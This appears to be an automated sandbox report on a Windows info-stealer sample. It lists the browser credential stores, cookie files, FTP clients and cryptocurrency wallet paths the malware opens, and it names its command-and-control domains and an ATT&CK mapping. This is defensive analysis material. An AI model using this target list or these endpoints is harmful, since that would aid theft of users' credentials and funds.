              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: Yara matchFile source: Process Memory Space: zhQFKte2vX.exe PID: 4208, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: zhQFKte2vX.exe PID: 4208, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, listed by tactic (numbers in parentheses are the counts shown next to a technique in the matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (35); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (35); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
zhQFKte2vX.exe | 66% | ReversingLabs | Win32.Trojan.StealC
zhQFKte2vX.exe | 100% | Avira | TR/Crypt.XPACK.Gen
zhQFKte2vX.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discokeyus.lat | 172.67.197.170 | true | false | | high
grannyejh.lat | unknown | unknown | false | | high
sweepyribs.lat | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
necklacebudi.lat | false | | high
https://discokeyus.lat/api | false | | high
aspecteirs.lat | false | | high
energyaffai.lat | false | | high
sweepyribs.lat | false | | high
sustainskelet.lat | false | | high
crosshuaht.lat | false | | high
rapeflowwj.lat | false | | high
grannyejh.lat | false | | high
discokeyus.lat | false | | high
                                                                              high
                                                                              https://discokeyus.lat:443/apiLocalzhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://discokeyus.lat/apiazhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://crl.microzhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668518553.000000000122A000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549507523.0000000001200000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgzhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://x1.c.lencr.org/0zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://x1.i.lencr.org/0zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchzhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://discokeyus.lat/zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1600764819.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1577738740.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1602483540.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uzhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9ezhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgzhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://discokeyus.lat:443/apizhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.mozilla.org/products/firefoxgro.allzhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctazhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.197.170 | discokeyus.lat | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578956
Start date and time: 2024-12-20 17:04:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: zhQFKte2vX.exe (renamed because the original name is a hash value)
Original Sample Name: 157a5af38553ccb117f6d278b2b046f0.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@3/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target zhQFKte2vX.exe, PID 4208 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big; too many NtOpenKeyEx calls found.
• Report size getting too big; too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: zhQFKte2vX.exe
Time | Type | Description
11:05:34 | API Interceptor | 10x Sleep call for process: zhQFKte2vX.exe modified
                                                                                                                                  No context
                                                                                                                                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947764114247639
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: zhQFKte2vX.exe
